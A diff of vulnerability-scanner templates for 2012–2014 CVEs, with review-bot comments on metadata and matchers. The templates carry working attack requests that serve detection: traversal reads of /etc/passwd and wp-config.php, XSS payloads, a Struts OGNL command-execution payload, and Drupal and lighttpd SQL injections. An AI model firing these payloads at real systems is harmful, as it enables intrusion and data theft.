reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-3152
|
||||
- https://www.exploit-db.com/exploits/31737
|
||||
tags: cve,cve2012,oracle,rce
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/reports/rwservlet/showenv"
|
||||
- "{{BaseURL}}/reports/rwservlet?report=test.rdf&desformat=html&destype=cache&JOBTYPE=rwurl&URLPARAMETER=file:///"
|
||||
|
||||
req-condition: true
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: dsl
|
||||
dsl:
|
||||
- 'contains(body_1, "Reports Servlet")'
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
||||
|
||||
- type: dsl
|
||||
dsl:
|
||||
- '!contains(body_2, "<html")'
|
||||
- '!contains(body_2, "<HTML")'
|
||||
condition: and
|
||||
|
||||
extractors:
|
||||
- type: regex
|
||||
name: windows_working_path
|
||||
regex:
|
||||
- ".?.?\\\\.*\\\\showenv"
|
||||
- type: regex
|
||||
name: linux_working_path
|
||||
regex:
|
||||
- "/.*/showenv"
|
|
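Review bot: the `id` is CVE-2012-3153 and the name covers both CVEs, but `reference` links only the NVD entry for CVE-2012-3152; add the CVE-2012-3153 entry. The last dsl matcher also passes for any second response without `<html` or `<HTML`, including an empty body or a plain-text error, so a positive indicator in `body_2` would make the result more reliable.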
@ -0,0 +1,29 @@
|
|||
id: CVE-2012-4242
|
||||
|
||||
info:
|
||||
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
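Review bot: `info` has no `description`, and the path appends the payload to `/?page_id=2&` as a bare query key, so nothing in the template says which input of MF Gig Calendar is reflected. Add a description naming the affected input, and say what `page_id=2` is expected to be on the target.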
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-4253
|
||||
|
||||
info:
|
||||
name: MySQLDumper 1.24.4 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Multiple directory traversal vulnerabilities in MySQLDumper 1.24.4 allow remote attackers to read arbitrary files via a .. (dot dot) in the (1) language parameter to learn/cubemail/install.php or (2) f parameter learn/cubemail/filemanagement.php, or execute arbitrary local files via a .. (dot dot) in the (3) config parameter to learn/cubemail/menu.php.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/37129
|
||||
- https://www.cvedetails.com/cve/CVE-2012-4253
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/learn/cubemail/filemanagement.php?action=dl&f=../../../../../../../../../../../etc/passwd%00"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-4273
|
||||
|
||||
info:
|
||||
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-4768
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Download Monitor < 3.3.5.9 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in the Download Monitor plugin before 3.3.5.9 for WordPress allows remote attackers to inject arbitrary web script or HTML via the dlsearch parameter to the default URI.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4768
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/?dlsearch=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,27 @@
|
|||
id: CVE-2012-4878
|
||||
|
||||
info:
|
||||
name: FlatnuX CMS - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Path traversal vulnerability in controlcenter.php in FlatnuX CMS 2011 08.09.2 allows remote administrators to read arbitrary files via a full pathname in the dir parameter in a contents/Files action.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/37034
|
||||
- https://www.cvedetails.com/cve/CVE-2012-4878
|
||||
tags: cve,cve2012,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/controlcenter.php?opt=contents/Files&dir=%2Fetc&ffile=passwd&opmod=open"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
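Review bot: the description limits this to remote administrators, yet the request to `controlcenter.php` is sent without any session, so the match only fires where the control center answers unauthenticated. State that precondition in `info`. A product tag next to `lfi` (the tags are only `cve,cve2012,lfi`) would also make the template findable by product.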
@ -0,0 +1,32 @@
|
|||
id: CVE-2012-4889
|
||||
|
||||
info:
|
||||
name: ManageEngine Firewall Analyzer 7.2 - Reflected Cross Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Multiple cross-site scripting (XSS) vulnerabilities in ManageEngine Firewall Analyzer 7.2 allow remote attackers to inject arbitrary web script or HTML via the (1) subTab or (2) tab parameter to createAnomaly.do; (3) url, (4) subTab, or (5) tab parameter to mindex.do; (6) tab parameter to index2.do; or (7) port parameter to syslogViewer.do.
|
||||
reference: |
|
||||
- https://www.securityfocus.com/bid/52841/info
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2012-4889
|
||||
tags: cve,cve2012,xss,manageengine
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/fw/syslogViewer.do?port=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- '</script><script>alert(document.domain)</script>'
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2012-5913
|
||||
|
||||
info:
|
||||
name: WordPress Integrator 1.32 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in wp-integrator.php in the WordPress Integrator module 1.32 for WordPress allows remote attackers to inject arbitrary web script or HTML via the redirect_to parameter to wp-login.php.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-5913
|
||||
tags: cve,cve2012,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</sCripT><sCripT>alert(document.domain)</sCripT>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Apache Struts2 S2-012 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-1965
|
||||
description: Apache Struts Showcase App 2.0.0 through 2.3.13, as used in Struts 2 before 2.3.14.3, allows remote attackers to execute arbitrary OGNL code via a crafted parameter name that is not properly handled when invoking a redirect.
|
||||
reference: http://struts.apache.org/development/2.x/docs/s2-012.html
|
||||
tags: cve,cve2013,apache,rce,struts
|
||||
|
||||
requests:
|
||||
|
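Review bot: the NVD link for CVE-2013-1965 and the Struts S2-012 advisory each appear as a single-line `reference:` value, and a mapping can hold only one `reference` key, so one of the two links is lost. List both under one `reference` key so the CVE record stays reachable from the template.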
@ -21,7 +22,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
|
|
|
@ -0,0 +1,20 @@
|
|||
id: CVE-2013-2248
|
||||
|
||||
info:
|
||||
name: Apache Struts - Multiple Open Redirection Vulnerabilities
|
||||
author: 0x_Akoko
|
||||
description: Apache Struts is prone to multiple open-redirection vulnerabilities because the application fails to properly sanitize user-supplied input.
|
||||
reference: https://www.exploit-db.com/exploits/38666
|
||||
severity: low
|
||||
tags: cve,cve2013,apache,redirect,struts
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/index.action?redirect:http://www.example.com/"
|
||||
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$'
|
||||
part: header
|
|
@ -2,9 +2,10 @@ id: CVE-2013-2251
|
|||
|
||||
info:
|
||||
name: Apache Struts 2 - DefaultActionMapper Prefixes OGNL Code Execution
|
||||
author: exploitation & @dwisiswant0
|
||||
author: exploitation,dwisiswant0,alex
|
||||
severity: critical
|
||||
description: In Struts 2 before 2.3.15.1 the information following "action:", "redirect:" or "redirectAction:" is not properly sanitized. Since said information will be evaluated as OGNL expression against the value stack, this introduces the possibility to inject server side code.
|
||||
reference: http://struts.apache.org/release/2.3.x/docs/s2-016.html
|
||||
tags: cve,cve2013,rce,struts,apache
|
||||
|
||||
requests:
|
||||
|
@ -28,6 +29,13 @@ requests:
|
|||
Accept: */*
|
||||
Accept-Language: en
|
||||
|
||||
- |
|
||||
GET /index.action?§params§%3A%24%7B%23context%5B%22xwork.MethodAccessor.denyMethodExecution%22%5D%3Dfalse%2C%23f%3D%23%5FmemberAccess.getClass().getDeclaredField(%22allowStaticMethodAccess%22)%2C%23f.setAccessible(true)%2C%23f.set(%23%5FmemberAccess%2Ctrue)%2C%23a%3D%40java.lang.Runtime%40getRuntime().exec(%22sh%20-c%20id%22).getInputStream()%2C%23b%3Dnew%20java.io.InputStreamReader(%23a)%2C%23c%3Dnew%20java.io.BufferedReader(%23b)%2C%23d%3Dnew%20char%5B5000%5D%2C%23c.read(%23d)%2C%23genxor%3D%23context.get(%22com.opensymphony.xwork2.dispatcher.HttpServletResponse%22).getWriter()%2C%23genxor.println(%23d)%2C%23genxor.flush()%2C%23genxor.close()%7D HTTP/1.1
|
||||
Host: {{Hostname}}
|
||||
Connection: close
|
||||
Accept: */*
|
||||
Accept-Language: en
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
|
@ -38,10 +46,4 @@ requests:
|
|||
- type: regex
|
||||
regex:
|
||||
- "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)"
|
||||
- type: word
|
||||
words:
|
||||
- "There is no Action mapped for namespace"
|
||||
- "The origin server did not find a current representation for the target resource"
|
||||
- "Apache Tomcat"
|
||||
condition: or
|
||||
part: body
|
||||
|
|
|
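Review bot: with the word matcher removed from this block, the regex `((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)` carries the whole content check, and its `[a-z0-9]+` rejects account names containing `-` or `_` (such as `www-data`) while `[0-9]{1,4}` rejects ids of five or more digits. Widen it to something like `[0-9]+\\([a-z0-9_-]+\\)` so the output for a service account still matches.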
@ -0,0 +1,29 @@
|
|||
id: CVE-2013-2287
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Uploader 1.0.4 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-2287
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/uploader/views/notify.php?notify=unnotif&blog=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
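Review bot: `info` carries no `description`; the `blog` parameter of `views/notify.php` is visible only in the path. Add one line naming the script and the parameter, as the sibling XSS templates in this commit do.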
@ -0,0 +1,29 @@
|
|||
id: CVE-2013-3526
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Traffic Analyzer - 'aoid' Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-3526
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/trafficanalyzer/js/ta_loaded.js.php?aoid=%3Cscript%3Ealert(1)%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<script>alert(1)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,38 @@
|
|||
id: CVE-2013-3827
|
||||
|
||||
info:
|
||||
name: Javafaces LFI
|
||||
author: Random-Robbie
|
||||
severity: medium
|
||||
description: Unspecified vulnerability in the Oracle GlassFish Server component in Oracle Fusion Middleware 2.1.1, 3.0.1, and 3.1.2; the Oracle JDeveloper component in Oracle Fusion Middleware 11.1.2.3.0, 11.1.2.4.0, and 12.1.2.0.0; and the Oracle WebLogic Server component in Oracle Fusion Middleware 10.3.6.0 and 12.1.1 allows remote attackers to affect confidentiality via unknown vectors related to Java Server Faces or Web Container.
|
||||
tags: cve,cve2013,lfi,javafaces,oracle
|
||||
reference: |
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-3827
|
||||
- https://www.exploit-db.com/exploits/38802
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/costModule/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/costModule/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/secureader/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/secureader/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/myaccount/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/myaccount/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource/web.xml?loc=../WEB-INF"
|
||||
- "{{BaseURL}}/SupportPortlet/faces/javax.faces.resource./WEB-INF/web.xml.jsf?ln=.."
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "<web-app"
|
||||
- "</web-app>"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
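Review bot: `name: Javafaces LFI` does not identify the affected products, which the description gives as Oracle GlassFish Server, JDeveloper and WebLogic Server; use a name that carries them. The ten paths are all checked with the same `<web-app` / `</web-app>` matcher, so one instance can produce several identical results; `stop-at-first-match: true` on the request would cut that down if the engine version in use supports it.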
@ -0,0 +1,30 @@
|
|||
id: CVE-2013-4117
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Category Grid View Gallery 2.3.1 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in includes/CatGridPost.php in the Category Grid View Gallery plugin 2.3.1 for WordPress allows remote attackers to inject arbitrary web script or HTML via the ID parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4117
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/category-grid-view-gallery/includes/CatGridPost.php?ID=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,30 @@
|
|||
id: CVE-2013-4625
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Duplicator < 0.4.5 - Reflected Cross-Site Scripting (XSS)
|
||||
author: daffainfo
|
||||
severity: medium
|
||||
description: Cross-site scripting (XSS) vulnerability in files/installer.cleanup.php in the Duplicator plugin before 0.4.5 for WordPress allows remote attackers to inject arbitrary web script or HTML via the package parameter.
|
||||
reference: https://nvd.nist.gov/vuln/detail/CVE-2013-4625
|
||||
tags: cve,cve2013,wordpress,xss,wp-plugin
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/duplicator/files/installer.cleanup.php?remove=1&package=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "</script><script>alert(document.domain)</script>"
|
||||
part: body
|
||||
|
||||
- type: word
|
||||
part: header
|
||||
words:
|
||||
- text/html
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,25 @@
|
|||
id: CVE-2013-5528
|
||||
|
||||
info:
|
||||
name: Cisco Unified Communications Manager 7/8/9 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in the Tomcat administrative web interface in Cisco Unified Communications Manager allows remote authenticated users to read arbitrary files via directory traversal sequences in an unspecified input string, aka Bug ID CSCui78815
|
||||
reference: https://www.exploit-db.com/exploits/40887
|
||||
tags: cve,cve2013,lfi,cisco
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/ccmadmin/bulkvivewfilecontents.do?filetype=samplefile&fileName=../../../../../../../../../../../../../../../../etc/passwd"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
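Review bot: `bulkvivewfilecontents.do` in the path looks like a misspelling of `bulkviewfilecontents.do`; check it against the referenced exploit-db entry, because a wrong script name makes the template silently report nothing. The description also restricts the issue to remote authenticated users, and the request is sent without a session.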
@ -0,0 +1,31 @@
|
|||
id: CVE-2013-7240
|
||||
|
||||
info:
|
||||
name: WordPress Plugin Advanced Dewplayer 1.2 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Directory traversal vulnerability in download-file.php in the Advanced Dewplayer plugin 1.2 for WordPress allows remote attackers to read arbitrary files via a .. (dot dot) in the dew_file parameter.
|
||||
reference: |
|
||||
- https://www.exploit-db.com/exploits/38936
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2013-7240
|
||||
tags: cve,cve2013,wordpress,wp-plugin,lfi
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- '{{BaseURL}}/wp-content/plugins/advanced-dewplayer/admin-panel/download-file.php?dew_file=../../../../wp-config.php'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "DB_NAME"
|
||||
- "DB_PASSWORD"
|
||||
- "DB_HOST"
|
||||
- "The base configurations of the WordPress"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,29 @@
|
|||
id: CVE-2014-2321
|
||||
|
||||
info:
|
||||
name: ZTE Cable Modem Web Shell
|
||||
description: web_shell_cmd.gch on ZTE F460 and F660 cable modems allows remote attackers to obtain administrative access via sendcmd requests, as demonstrated by using "set TelnetCfg" commands to enable a TELNET service with specified credentials.
|
||||
author: geeknik
|
||||
reference:
|
||||
- https://yosmelvin.wordpress.com/2017/09/21/f660-modem-hack/
|
||||
- https://jalalsela.com/zxhn-h108n-router-web-shell-secrets/
|
||||
severity: high
|
||||
tags: iot,cve,cve2014,zte
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/web_shell_cmd.gch"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "please input shell command"
|
||||
- "ZTE Corporation. All rights reserved"
|
||||
part: body
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -0,0 +1,21 @@
|
|||
id: CVE-2014-2323
|
||||
|
||||
info:
|
||||
name: Lighttpd 1.4.34 SQL injection and path traversal
|
||||
description: SQL injection vulnerability in mod_mysql_vhost.c in lighttpd before 1.4.35 allows remote attackers to execute arbitrary SQL commands via the host name, related to request_check_hostname.
|
||||
reference: https://download.lighttpd.net/lighttpd/security/lighttpd_sa_2014_01.txt
|
||||
author: geeknik
|
||||
severity: critical
|
||||
tags: cve,cve2014,sqli,lighttpd
|
||||
|
||||
requests:
|
||||
- raw:
|
||||
- |+
|
||||
GET /etc/passwd HTTP/1.1
|
||||
Host: [::1]' UNION SELECT '/
|
||||
|
||||
unsafe: true
|
||||
matchers:
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0:"
|
|
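Review bot: the matcher uses `root:[x*]:0:0:` while the other passwd checks in this commit move to `root:.*:0:0`; pick one pattern so a hashed or empty password field is treated the same everywhere. There is also no status matcher, and the name mentions path traversal while the description and tags cover only the SQL injection in `mod_mysql_vhost.c`.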
@ -0,0 +1,32 @@
|
|||
id: arbitrary-file-read-in-dompdf
|
||||
|
||||
info:
|
||||
name: Arbitrary file read in dompdf < v0.6.0
|
||||
author: 0x_Akoko
|
||||
severity: high
|
||||
reference: https://www.exploit-db.com/exploits/33004
|
||||
tags: dompdf,lfi
|
||||
|
||||
# - "/dompdf.php?input_file=C:/windows/win.ini"
|
||||
# - "/dompdf.php?input_file=/etc/passwd"
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/dompdf.php?input_file=dompdf.php"
|
||||
- "{{BaseURL}}/PhpSpreadsheet/Writer/PDF/DomPDF.php?input_file=dompdf.php"
|
||||
- "{{BaseURL}}/lib/dompdf/dompdf.php?input_file=dompdf.php"
|
||||
- "{{BaseURL}}/includes/dompdf/dompdf.php?input_file=dompdf.php"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: word
|
||||
words:
|
||||
- "application/pdf"
|
||||
- 'filename="dompdf_out.pdf"'
|
||||
part: header
|
||||
condition: and
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
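Review bot: the matchers look only at response headers (`application/pdf` and `filename="dompdf_out.pdf"`), which shows that `dompdf.php` renders the requested `input_file` but not that the returned PDF contains the file's source; say so in `info` or add a body check. The two commented-out paths between `info` and `requests` should be removed or turned into a `description`, which this template lacks.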
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-2962
|
||||
|
||||
info:
|
||||
name: Belkin N150 Router 1.00.08/1.00.09 - Directory Traversal
|
||||
author: daffainfo
|
||||
severity: high
|
||||
description: Path traversal vulnerability in the webproc cgi module on the Belkin N150 F9K1009 v1 router with firmware before 1.00.08 allows remote attackers to read arbitrary files via a full pathname in the getpage parameter.
|
||||
reference: https://www.exploit-db.com/exploits/38488
|
||||
tags: cve,cve2014,lfi,router
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
- "{{BaseURL}}/cgi-bin/webproc?getpage=/etc/passwd&var:page=deviceinfo"
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:.*:0:0"
|
||||
|
||||
- type: status
|
||||
status:
|
||||
- 200
|
|
@ -4,7 +4,11 @@ info:
|
|||
name: ElasticSearch v1.1.1/1.2 RCE
|
||||
author: pikpikcu
|
||||
severity: critical
|
||||
reference: https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
|
||||
description: |
|
||||
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execute arbitrary MVEL expressions and Java code via the source parameter to _search. NOTE: this only violates the vendor's intended security policy if the user does not run Elasticsearch in its own independent virtual machine.
|
||||
reference: |
|
||||
- https://github.com/vulhub/vulhub/tree/master/elasticsearch/CVE-2014-3120
|
||||
- https://www.elastic.co/blog/logstash-1-4-3-released
|
||||
tags: cve,cve2014,elastic,rce
|
||||
|
||||
requests:
|
||||
|
@ -45,7 +49,7 @@ requests:
|
|||
|
||||
- type: regex
|
||||
regex:
|
||||
- "root:[x*]:0:0"
|
||||
- "root:.*:0:0"
|
||||
part: body
|
||||
|
||||
- type: status
|
||||
|
|
|
@ -0,0 +1,32 @@
|
|||
id: CVE-2014-3704
|
||||
info:
|
||||
name: Drupal Sql Injetion
|
||||
author: princechaddha
|
||||
severity: high
|
||||
description: The expandArguments function in the database abstraction API in Drupal core 7.x before 7.32 does not properly construct prepared statements, which allows remote attackers to conduct SQL injection attacks via an array containing crafted keys.
|
||||
reference: |
|
||||
- https://www.drupal.org/SA-CORE-2014-005
|
||||
- http://www.exploit-db.com/exploits/34984
|
||||
- http://www.exploit-db.com/exploits/34992
|
||||
- http://www.exploit-db.com/exploits/34993
|
||||
- http://www.exploit-db.com/exploits/35150
|
||||
tags: cve,cve2014,drupal,sqli
|
||||
|
||||
requests:
|
||||
- method: POST
|
||||
path:
|
||||
- "{{BaseURL}}/?q=node&destination=node"
|
||||
body: 'pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a'
|
||||
|
||||
matchers-condition: and
|
||||
matchers:
|
||||
- type: status
|
||||
status:
|
||||
- 500
|
||||
|
||||
- type: word
|
||||
words:
|
||||
- "PDOException"
|
||||
- "e807f1fcf82d132f9bb018ca6738a19f"
|
||||
condition: and
|
||||
part: body
|
|
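Review bot: `name: Drupal Sql Injetion` is misspelled; use `Drupal SQL Injection`. The word matcher depends on the literal `e807f1fcf82d132f9bb018ca6738a19f`, so add a comment that this is the MD5 of the `1234567890` value in the request body, otherwise the string is unexplained to anyone maintaining the template.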
@ -0,0 +1,25 @@
|
|||
id: CVE-2014-3744
|
||||
|
||||
info:
|
||||
name: Node.js st module Directory Traversal
|
||||
author: geeknik
|
||||
description: Directory traversal vulnerability in the st module before 0.2.5 for Node.js allows remote attackers to read arbitrary files via a %2e%2e (encoded dot dot) in an unspecified path.
|
||||
reference: |
|
||||
- https://github.com/advisories/GHSA-69rr-wvh9-6c4q
|
||||
- https://snyk.io/vuln/npm:st:20140206
|
||||
severity: high
|
||||
tags: cve,cve2014,lfi,nodejs,st
|
||||
|
||||
requests:
|
||||
- method: GET
|
||||
path:
|
||||
